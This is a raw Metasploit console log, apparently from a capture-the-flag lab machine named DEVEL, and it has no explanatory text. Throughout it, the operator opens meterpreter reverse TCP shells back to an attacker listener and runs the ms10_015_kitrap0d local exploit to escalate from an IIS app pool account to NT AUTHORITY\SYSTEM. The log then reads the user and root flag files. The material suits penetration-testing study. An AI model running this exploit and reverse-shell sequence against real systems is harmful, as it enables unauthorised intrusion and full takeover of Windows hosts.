msf5 > use exploit/windows/local/ms10_015_kitrap0d
[*] Using configured payload windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms10_015_kitrap0d) > options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  4                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.10      yes       The listen address (an interface may be specified)
   LPORT     9999             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)


msf5 exploit(windows/local/ms10_015_kitrap0d) > set lport 2121
lport => 2121
msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 6
session => 6
msf5 exploit(windows/local/ms10_015_kitrap0d) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                                                       Connection
  --  ----  ----                     -----------                                                                       ----------
  5         shell x86/windows        Spawn Shell... Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Micros...  10.10.14.10:4545 -> 10.10.10.5:49157 (10.10.10.5)
  6         meterpreter x86/windows  IIS APPPOOL\Web @ DEVEL                                                           10.10.14.10:1111 -> 10.10.10.5:49158 (10.10.10.5)

msf5 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 10.10.14.10:2121 
[*] Launching notepad to host the exploit...
[+] Process 3944 launched.
[*] Reflectively injecting the exploit DLL into 3944...
[*] Injecting exploit into 3944 ...
[*] Exploit injected. Injecting payload into 3944...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ms10_015_kitrap0d) > 



msf5 exploit(windows/local/ms10_015_kitrap0d) > sessions -i 6
[*] Starting interaction with 6...
meterpreter > cd %temp%
meterpreter > pwd
C:\Windows\TEMP










msf5 post(multi/manage/shell_to_meterpreter) > sessions -i 10
[*] Starting interaction with 10...

meterpreter > pwd
c:\windows\system32\inetsrv
meterpreter > cd %temp%
meterpreter > pwd
C:\Windows\TEMP
meterpreter > sessions -i 9
Usage: sessions <id>

Interact with a different session Id.
This works the same as calling this from the MSF shell: sessions -i <session id>

meterpreter > background
[*] Backgrounding session 10...
msf5 post(multi/manage/shell_to_meterpreter) > sessions -i 9
[*] Starting interaction with 9...


c:\windows\system32\inetsrv>pwd
pwd
'pwd' is not recognized as an internal or external command,
operable program or batch file.

c:\windows\system32\inetsrv>

c:\windows\system32\inetsrv>exit
exit

^C
Abort session 9? [y/N]  y

[*] 10.10.10.5 - Command shell session 9 closed.  Reason: User exit
msf5 post(multi/manage/shell_to_meterpreter) > sessions 

Active sessions
===============

  Id  Name  Type                     Information              Connection
  --  ----  ----                     -----------              ----------
  10        meterpreter x86/windows  IIS APPPOOL\Web @ DEVEL  10.10.14.10:1111 -> 10.10.10.5:49158 (10.10.10.5)

msf5 post(multi/manage/shell_to_meterpreter) > session -i 10
[-] Unknown command: session.
msf5 post(multi/manage/shell_to_meterpreter) > sessions -i 10
[*] Starting interaction with 10...

meterpreter > pwd
C:\Windows\TEMP
meterpreter > background
[*] Backgrounding session 10...
msf5 post(multi/manage/shell_to_meterpreter) > use post/multi/manage/shell_to_meterpreter
msf5 post(multi/manage/shell_to_meterpreter) > use exploit/windows/local/ms10_015_kitrap0d
[*] Using configured payload windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms10_015_kitrap0d) > show options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  8                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.10      yes       The listen address (an interface may be specified)
   LPORT     2121             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)


msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 10
session => 10
msf5 exploit(windows/local/ms10_015_kitrap0d) > set lport 5647
lport => 5647
msf5 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 10.10.14.10:5647 
[*] Launching notepad to host the exploit...
[+] Process 3944 launched.
[*] Reflectively injecting the exploit DLL into 3944...
[*] Injecting exploit into 3944 ...
[*] Exploit injected. Injecting payload into 3944...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (176195 bytes) to 10.10.10.5
[*] Meterpreter session 11 opened (10.10.14.10:5647 -> 10.10.10.5:49159) at 2020-11-29 00:51:28 +0800


Active sessions
===============
  Id  Name  Type                     Information                  Connection
  --  ----  ----                     -----------                  ----------
  10        meterpreter x86/windows  IIS APPPOOL\Web @ DEVEL      10.10.14.10:1111 -> 10.10.10.5:49158 (10.10.10.5)
  11        meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DEVEL  10.10.14.10:5647 -> 10.10.10.5:49159 (10.10.10.5)







meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > cd Users
meterpreter > ls
Listing: C:\Users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   8192  dir   2017-03-18 07:16:43 +0800  Administrator
40777/rwxrwxrwx   0     dir   2009-07-14 12:53:55 +0800  All Users
40777/rwxrwxrwx   8192  dir   2017-03-18 07:06:26 +0800  Classic .NET AppPool
40555/r-xr-xr-x   8192  dir   2009-07-14 10:37:05 +0800  Default
40777/rwxrwxrwx   0     dir   2009-07-14 12:53:55 +0800  Default User
40555/r-xr-xr-x   4096  dir   2009-07-14 10:37:05 +0800  Public
40777/rwxrwxrwx   8192  dir   2017-03-17 22:17:37 +0800  babis
100666/rw-rw-rw-  174   fil   2009-07-14 12:41:57 +0800  desktop.ini







meterpreter > cd babis
meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Users\babis\Desktop
===============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2017-03-17 22:17:51 +0800  desktop.ini
100444/r--r--r--  32    fil   2017-03-18 07:14:21 +0800  user.txt.txt

meterpreter > caat user.txt.txt
[-] Unknown command: caat.
meterpreter > cat user.txt.txt
9ecdd6a3aedf24b41562fea70f4cb3e8


meterpreter > cd Administrator
meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2017-03-18 07:16:53 +0800  desktop.ini
100444/r--r--r--  32    fil   2017-03-18 07:17:20 +0800  root.txt.txt

meterpreter > cat root.txt.txt
e621a0b5041708797c4fc4728bc72b4b






=================================


msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.10      yes       The listen address (an interface may be specified)
   LPORT     4545             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set lport 9999
lport => 9999
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.10:9999 
[*] Sending stage (176195 bytes) to 10.10.10.5
[*] Meterpreter session 12 opened (10.10.14.10:9999 -> 10.10.10.5:49161) at 2020-11-29 00:59:11 +0800

meterpreter > pwd
c:\windows\system32\inetsrv
meterpreter > cd %temp%
meterpreter > pwd
C:\Windows\TEMP
meterpreter > background
[*] Backgrounding session 12...
msf5 exploit(multi/handler) > sessions -i 12
[*] Starting interaction with 12...

meterpreter > getuid
Server username: IIS APPPOOL\Web
meterpreter > background
[*] Backgrounding session 12...
msf5 exploit(multi/handler) > back
msf5 > use exploit/windows/local/ms10_015_kitrap0d
[*] Using configured payload windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms10_015_kitrap0d) > show options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  10               yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.10      yes       The listen address (an interface may be specified)
   LPORT     5647             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)


msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 12
session => 12
msf5 exploit(windows/local/ms10_015_kitrap0d) > set lport 6832
lport => 6832
msf5 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 10.10.14.10:6832 
[*] Launching notepad to host the exploit...
[+] Process 2640 launched.
[*] Reflectively injecting the exploit DLL into 2640...
[*] Injecting exploit into 2640 ...
[*] Exploit injected. Injecting payload into 2640...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (176195 bytes) to 10.10.10.5
[*] Meterpreter session 13 opened (10.10.14.10:6832 -> 10.10.10.5:49162) at 2020-11-29 01:00:48 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM


